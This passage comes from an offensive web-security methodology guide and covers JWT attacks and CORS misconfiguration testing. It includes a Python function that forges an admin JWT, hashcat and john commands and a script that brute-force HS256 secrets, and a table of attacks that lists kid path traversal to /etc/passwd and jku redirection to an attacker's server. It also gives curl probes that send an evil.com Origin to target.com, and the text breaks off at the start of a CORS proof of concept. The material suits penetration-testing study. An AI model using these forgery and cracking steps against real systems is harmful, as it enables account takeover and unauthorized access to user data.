&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;p&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json.loads&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;base64.urlsafe_b64decode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;parts&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;1&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; + &lt;span style="color:#a6d189"&gt;&amp;#39;===&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; h, p
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;header, &lt;span style="color:#f2d5cf"&gt;payload&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; decode_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;Alg: {header.get(&amp;#39;alg&amp;#39;)}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;Payload: {payload}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="162-attacks-by-algorithm" &gt;
&lt;div&gt;
&lt;a href="#162-attacks-by-algorithm"&gt;
##
&lt;/a&gt;
16.2 Attacks by Algorithm
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;How&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;alg=none&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Remove signature, header &lt;code&gt;{&amp;quot;alg&amp;quot;:&amp;quot;none&amp;quot;}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RS256→HS256 confusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RS256&lt;/td&gt;
&lt;td&gt;Uses public key as HMAC secret&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;HS256 weak secret&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HS256&lt;/td&gt;
&lt;td&gt;Brute force the secret (wordlist)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;kid injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;kid=../../../etc/passwd → path traversal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;jku/jwk injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Point jku/jwk to attacker&amp;rsquo;s server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;exp not validated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Expired token still accepted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;aud not validated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Token from another service accepted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="163-jwt-forgery-with-rsa-private-key" &gt;
&lt;div&gt;
&lt;a href="#163-jwt-forgery-with-rsa-private-key"&gt;
##
&lt;/a&gt;
16.3 JWT Forgery with RSA Private Key
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.serialization&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; load_pem_private_key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(&lt;span style="color:#a6d189"&gt;&amp;#39;private.key&amp;#39;&lt;/span&gt;) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(f&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;read()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;forge_jwt&lt;/span&gt;(payload, alg&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;: alg, &lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(header)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(payload)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;h&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(sig)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;h&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;s&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Example: forge an admin token&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;admin_token &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; forge_jwt({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sub&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin@target.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;role&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()) &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ WARNING — Limitations&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Laravel Passport&lt;/strong&gt;: validates &lt;code&gt;jti&lt;/code&gt; against &lt;code&gt;oauth_access_tokens&lt;/code&gt; table. Token forged with RSA key but not registered in DB → access denied.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auth0&lt;/strong&gt;: validates signature against JWKS endpoint. Local private key doesn&amp;rsquo;t work if the server validates with JWKS.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Firebase Auth&lt;/strong&gt;: tokens are validated against Google&amp;rsquo;s JWKS. Local key is useless.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="164-brute-force-hs256-secret" &gt;
&lt;div&gt;
&lt;a href="#164-brute-force-hs256-secret"&gt;
##
&lt;/a&gt;
16.4 Brute Force HS256 Secret
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Using hashcat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hashcat -m &lt;span style="color:#ef9f76"&gt;16500&lt;/span&gt; jwt_token.txt /usr/share/wordlists/rockyou.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Using john&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;john jwt.txt --wordlist&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;rockyou.txt --format&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;HMAC-SHA256
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Simple Python script&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;import hmac, hashlib, base64, json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;def verify_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token, secret&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;parts&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; token.split&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header_b64, payload_b64, &lt;span style="color:#f2d5cf"&gt;sig_b64&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; parts
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;sig_check&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64.urlsafe_b64encode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hmac.new&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;secret.encode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;, f&lt;span style="color:#a6d189"&gt;&amp;#39;{header_b64}.{payload_b64}&amp;#39;&lt;/span&gt;.encode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;, hashlib.sha256&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.digest&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.rstrip&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;b&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;sig_check&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; sig_b64
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test common secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; secret in &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;secret&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;jwt_secret&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;changeme&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;supersecret&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; verify_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token, secret&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 Secret found: {secret}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Hardcoded JWTs in the delivery platform&amp;rsquo;s JS bundle — 2 HS256 tokens with &lt;code&gt;appName&lt;/code&gt; and &lt;code&gt;tokenVersion&lt;/code&gt;, used as &amp;ldquo;app tokens&amp;rdquo; to authenticate BFF API requests. The server blindly trusted these tokens.&lt;/p&gt;
&lt;h3 id="165-jwt-in-javascript-bundles" &gt;
&lt;div&gt;
&lt;a href="#165-jwt-in-javascript-bundles"&gt;
##
&lt;/a&gt;
16.5 JWT in JavaScript Bundles
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;JWTs found in client-side code are often used as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;App tokens&lt;/strong&gt;: identify which application is calling the API&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anon tokens&lt;/strong&gt;: &amp;ldquo;anonymous user&amp;rdquo; tokens&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dev tokens&lt;/strong&gt;: forgotten by developers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Always extract and analyze JWTs from JS bundles. Even if the secret cannot be cracked, the payload reveals the structure and can be reused.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="17-cors-misconfiguration" &gt;
&lt;div&gt;
&lt;a href="#17-cors-misconfiguration"&gt;
#
&lt;/a&gt;
17. CORS MISCONFIGURATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="171-how-to-test" &gt;
&lt;div&gt;
&lt;a href="#171-how-to-test"&gt;
##
&lt;/a&gt;
17.1 How to Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Origin reflected?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: https://evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;access-control&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Null origin accepted?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: null&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;access-control&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Credentials allowed?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If Access-Control-Allow-Credentials: true + reflected Origin = EXPLOITABLE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Preflight (OPTIONS) accepts sensitive methods?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI -X OPTIONS -H &lt;span style="color:#a6d189"&gt;&amp;#34;Origin: https://evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Request-Method: DELETE&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/api/data&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="172-cors-severity-levels" &gt;
&lt;div&gt;
&lt;a href="#172-cors-severity-levels"&gt;
##
&lt;/a&gt;
17.2 CORS Severity Levels
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Configuration&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Explanation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: *&lt;/code&gt; without credentials&lt;/td&gt;
&lt;td&gt;Info&lt;/td&gt;
&lt;td&gt;Public by design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: https://evil.com&lt;/code&gt; (reflected)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Without credentials, public reading&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: null&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Sandboxed iframe can exploit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ACAO: reflected&lt;/code&gt; + &lt;code&gt;ACAC: true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High/Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Authenticated cross-origin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Preflight allows DELETE/PUT with credentials&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Cross-origin writing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="173-cors--credentials-proof-of-concept" &gt;
&lt;div&gt;
&lt;a href="#173-cors--credentials-proof-of-concept"&gt;
##
&lt;/a&gt;
17.3 CORS + Credentials Proof of Concept
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- Save as cors_poc.html and open in the browser --&amp;gt;&lt;/span&gt;
